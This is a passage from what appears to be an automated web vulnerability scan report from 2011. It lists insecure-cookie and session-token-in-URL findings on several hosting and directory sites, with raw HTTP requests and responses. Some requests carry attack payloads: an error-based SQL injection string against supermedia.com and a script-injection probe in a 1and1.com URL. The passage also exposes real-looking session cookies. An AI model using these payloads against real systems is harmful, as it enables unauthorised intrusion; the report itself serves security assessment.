Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3Dgpash016&isc=gpash016&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:26 GMT
Content-Length: 246275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
11.8. https://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/website-builder.aspx?app%5Fhdr=&isc=gpash017 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:31 GMT
Content-Length: 139715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
11.9. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:14:03 GMT
Set-Cookie: JSESSIONID=EBDFBF9AC748937A3214EB87AF5E4C7F.app5-a2; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sun, 24-Apr-2011 19:14:02 GMT; Path=/
Set-Cookie: CstrStatus=RVU; Expires=Sun, 24-Apr-2011 19:14:02 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a42378b;path=/;httponly
Content-Length: 21459


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
12. Session token in URL  previous  next
There are 28 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

12.1. http://a1.bing4.com/fd/fb/simls  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://a1.bing4.com
Path:   /fd/fb/simls

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /fd/fb/simls?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: a1.bing4.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_02_0_865148&sId=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=5A3DD7A43C5B43BB87A565DA84737466; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110313; _SS=SID=9B679FC2C38D46A6AEF54858BDEBEE5C; _HOP=I=1&TS=1301101465

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 0
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 01:05:17 GMT
Connection: close

12.2. http://order.1and1.com/xml/order  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 25 Mar 2011 20:43:33 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085813561
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAmLFxlKx4fGxswNzM1LS0tKio=; Expires=Wed, 12-Apr-2079 23:57:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8

12.3. http://order.1and1.com/xml/order/CloudDynamicServer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/CloudDynamicServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:23:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/CloudDynamicServer?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain

12.4. http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 25 Mar 2011 20:42:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
Content-Length: 0
Content-Type: text/plain

12.5. http://order.1and1.com/xml/order/Contact  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Contact

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Contact;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.support HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:26:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...
12.6. http://order.1and1.com/xml/order/DomaininfoMove  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/DomaininfoMove;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:42 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/DomaininfoMove?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer
Content-Length: 0
Connection: close
Content-Type: text/plain

12.7. http://order.1and1.com/xml/order/Eshops  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Eshops;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Eshops?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain

12.8. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 21:08:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMpL19oLiEiHh4cIx84MDAwLS0=; Expires=Thu, 13-Apr-2079 00:22:27 GMT; Path=/
ETag: 5f516b3df0af9786bc8afb1e77028d17
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36385


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=ngh" rel="redirectlink-ngh">MyBusiness Site</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li class="tabs-home"><a style="background:none;" class="core_button_normal" href="/xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.customerlogin&amp;site=CC.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.nav.customerlogin" rel="redirectlink-hd-nav-customerlogin">
Customer Login
</a>
...[SNIP]...
<li class="tabs-home"><a class="core_button_normal" href="/xml/order/Contact;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.support" rel="button-hd-nav-support">Support</a>
...[SNIP]...
</table><a class="teaserlink" href="/xml/order/Instant;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/free_6mounths.png" alt="Web Hosting" class="alphapng hostingbox price-stopper-countdown" width="193" height="121"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Hosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=weiter" rel="button-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Hosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/pr_9_99_diy_free_trial.png" alt="FREE TRIAL then starting at $ 9.99/month" class="alphapng pos-price-doityourself price-stopper" width="89" height="95"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"></a>
...[SNIP]...
<div id="navigation" class="homepos"><a class="core_button_normal" href="/xml/order/sitedesign;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"><img src="/oneandone_en_common/img/pages/Home/teaser_sitedesign.png" alt="" class="alphapng teaser-sitedesign" width="186" height="191">
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.mybusinesssite&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=hd.nav.mybusinesssite" rel="redirectlink-hd-nav-mybusinesssite">MyBusiness Site</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Domains</a></li><li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Microsoft Hosting</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Instant Mail</a>
...[SNIP]...
